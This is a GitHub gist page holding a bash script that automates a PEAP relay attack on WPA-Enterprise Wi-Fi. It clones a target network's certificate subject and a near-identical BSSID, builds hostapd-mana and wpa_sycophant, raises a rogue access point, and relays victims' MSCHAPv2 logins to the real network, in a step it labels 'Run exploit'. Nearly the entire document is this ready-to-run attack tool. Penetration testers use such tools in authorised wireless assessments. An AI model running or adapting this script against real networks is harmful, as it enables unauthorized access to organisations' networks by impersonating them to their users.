Skip to content

Instantly share code, notes, and snippets.

@mpgn
Forked from 1mm0rt41PC/wifi-relay.sh
Created November 2, 2020 11:01
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save mpgn/a1d281e98f39e0ec20c450c72f87ad8a to your computer and use it in GitHub Desktop.
Wifi easy PEAP relay
#!/bin/bash
# Wifi easy PEAP relay
#
# Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
#
# Ref:
# - https://github.com/sensepost/hostapd-mana
# - https://github.com/sensepost/wpa_sycophant
# - https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
# - https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052
#
# Usage:
# wifi-relay.sh "TARGET-SSID"
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to the
# Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
mkdir -p hostapd-mana && cd hostapd-mana
export IFACE_ROGUEAP='wlan0'
export IFACE_RELAY='wlan1'
export SSID="$1"
export BSSID='42:42:42:42:42:42'
export CHANNEL=6
export HW_MODE=g
export COUNTRY='FR'
export CERT_SUBJECT="/C=$COUNTRY/ST=France/L=Paris/O=xxx/OU=xxx/CN=xxx.org/emailAddress=xxx@xxx.org"
export DH_FILE="`pwd`/hostapd-mana.dh"
export EAP_USER="`pwd`/hostapd-mana.eap_user"
export CERT="`pwd`/hostapd-mana"
export PATH_HOSTAPD="`pwd`" # DO NOT TOUCH
function prnt {
echo -e "\n*******************************************************************************"
echo "[*] $1"
echo '*******************************************************************************'
}
prnt 'Create certificate'
[ ! -f "$DH_FILE" ] && openssl dhparam -out $DH_FILE 2048
if [ ! -f "$CERT.key" ] || [ ! -f "$CERT.crt" ]; then
cat <<EOD > $PATH_HOSTAPD/wpa_supplicant.conf
network={
ssid="$SSID"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
identity="xxx"
password="xxx"
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
}
EOD
rfkill unblock all
ifconfig $IFACE_ROGUEAP up
wpa_supplicant -i $IFACE_ROGUEAP -c $PATH_HOSTAPD/wpa_supplicant.conf | tee $PATH_HOSTAPD/wpa_supplicant.log &
export wpa_supplicant_pid=$!
sleep 45
kill -9 $wpa_supplicant_pid
export SUBJECT=`cat $PATH_HOSTAPD/wpa_supplicant.log | grep -E 'subject=' | head -n1 | sed -E "s/.+subject='([^']+)'.+/\1/g"`
if [ "$SUBJECT" != "" ]; then
export COUNTRY=`cat $PATH_HOSTAPD/wpa_supplicant.log | grep -E 'subject=' | head -n1 | sed -E "s/.+subject='\/C=([^/]+).+/\1/g"`
echo "$SUBJECT" > $PATH_HOSTAPD/CERT_SUBJECT
echo "$COUNTRY" > $PATH_HOSTAPD/COUNTRY
fi
export tmp_bssid=`cat $PATH_HOSTAPD/wpa_supplicant.log | grep -E 'Trying to authenticate with' | head -n1 | sed -E "s/.+Trying to authenticate with ([^ ]+).+/\1/g"`
cat <<'EOD' | python3 > $PATH_HOSTAPD/BSSID
import os,sys;
x=os.environ['tmp_bssid'].split(':');
x[-1] = hex((int(x[-1],16)+15)%255).replace('0x','');
print(':'.join(x));
EOD
openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout $CERT.key -out $CERT.crt -subj $CERT_SUBJECT
fi
[ "`cat $PATH_HOSTAPD/COUNTRY`" != "" ] && export COUNTRY=`cat $PATH_HOSTAPD/COUNTRY`
[ "`cat $PATH_HOSTAPD/BSSID`" != "" ] && export BSSID=`cat $PATH_HOSTAPD/BSSID`
iw reg set $COUNTRY
if [ ! -f "$PATH_HOSTAPD/hostapd-mana" ] || [ ! -f "$PATH_HOSTAPD/hostapd-mana_cli" ]; then
prnt 'Download hostapd-mana'
wget https://github.com/sensepost/hostapd-mana/archive/2.6.5.zip
unzip 2.6.5.zip && rm 2.6.5.zip
cd hostapd-mana-2.6.5/hostapd/
make -j4
mv hostapd $PATH_HOSTAPD/hostapd-mana
mv hostapd_cli $PATH_HOSTAPD/hostapd-mana_cli
cd $PATH_HOSTAPD
rm -rf hostapd-mana-2.6.5/
fi
prnt 'Configure hostapd-mana'
cat <<EOD > "$PATH_HOSTAPD/hostapd.conf"
mana_wpe=1
enable_sycophant=1
sycophant_dir=/tmp/
interface=$IFACE_ROGUEAP
ssid=$SSID
bssid=$BSSID
channel=$CHANNEL
hw_mode=$HW_MODE
ieee80211n=1
ieee80211ac=1
ieee80211w=0
ignore_broadcast_ssid=0
max_num_sta=255
rts_threshold=2347
fragm_threshold=2346
dtim_period=1
beacon_int=100
country_code=$COUNTRY
ctrl_interface=`pwd`/hostapd-mana-ctrl_interface.run
ctrl_interface_group=0
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
macaddr_acl=0
# wpa ---
auth_algs=3
wpa=2
wpa_pairwise=TKIP CCMP
# eap ---
eap_user_file=$EAP_USER
eap_server=1
eap_fast_a_id=101112131415161718191a1b1c1d1e1f
eap_fast_a_id_info=hostapd-wpe
eap_fast_prov=3
ieee8021x=1
pac_key_lifetime=604800
pac_key_refresh_time=86400
pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
wpa_key_mgmt=WPA-EAP
dh_file=$DH_FILE
server_cert=$CERT.crt
private_key=$CERT.key
EOD
cat <<EOD > $EAP_USER
# hostapd user database for integrated EAP server
# Each line must contain an identity, EAP method(s), and an optional password
# separated with whitespace (space or tab). The identity and password must be
# double quoted ("user"). Password can alternatively be stored as
# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password
# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means
# that the plaintext password does not need to be included in the user file.
# Password hash is stored as hash:<16-octets of hex data> without quotation
# marks.
# [2] flag in the end of the line can be used to mark users for tunneled phase
# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous
# identity can be used in the unencrypted phase 1 and the real user identity
# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous
# access is needed, two user entries is needed, one for phase 1 and another
# with the same username for phase 2.
#
# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use
# password option.
# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a
# password.
# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration.
#
# * can be used as a wildcard to match any user identity. The main purposes for
# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to
# avoid having to configure every certificate for EAP-TLS authentication. The
# first matching entry is selected, so * should be used as the last phase 1
# user entry.
#
# "prefix"* can be used to match the given prefix and anything after this. The
# main purpose for this is to be able to avoid EAP method negotiation when the
# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This
# is only allowed for phase 1 identities.
#
# Multiple methods can be configured to make the authenticator try them one by
# one until the peer accepts one. The method names are separated with a
# comma (,).
#
# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP
# version based on the Phase 1 identity. Without this flag, the EAP
# authenticator advertises the highest supported version and select the version
# based on the first PEAP packet from the supplicant.
#
# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel.
# Tunneled EAP methods are configured with standard EAP method name and [2]
# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP,
# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a
# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password
# hash
# Phase 1 users
* PEAP,TTLS,TLS,FAST
"t" GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5 "t" [2]
# Phase 2 users
"t-md5" MD5 "password" [2]
"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2]
"t-gtc" GTC "password" [2]
EOD
if [ ! -f "$PATH_HOSTAPD/wpa_supplicant/wpa_supplicant" ] || [ ! -f "$PATH_HOSTAPD/wpa_sycophant.sh" ]; then
prnt 'Download wpa_sycophant'
wget https://github.com/sensepost/wpa_sycophant/archive/v1.0.zip && unzip v1.0.zip
cd wpa_sycophant-1.0/wpa_supplicant/
make -j4
mkdir -p $PATH_HOSTAPD/wpa_supplicant/
mv wpa_supplicant $PATH_HOSTAPD/wpa_supplicant/
mv ../wpa_sycophant.sh $PATH_HOSTAPD/
cd $PATH_HOSTAPD
rm -rf v1.0.zip wpa_sycophant-1.0
fi
prnt 'Configure wpa_sycophant'
cat <<EOD > $PATH_HOSTAPD/wpa_sycophant.conf
network={
ssid="$SSID"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=$BSSID
}
EOD
(
prnt 'Configure interfaces'
rfkill unblock all && \
ifconfig $IFACE_ROGUEAP up && \
ifconfig $IFACE_RELAY up
) && (
prnt 'Run exploit'
xterm -e $PATH_HOSTAPD/wpa_sycophant.sh -c $PATH_HOSTAPD/wpa_sycophant.conf -i $IFACE_RELAY &
./hostapd-mana hostapd.conf
)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment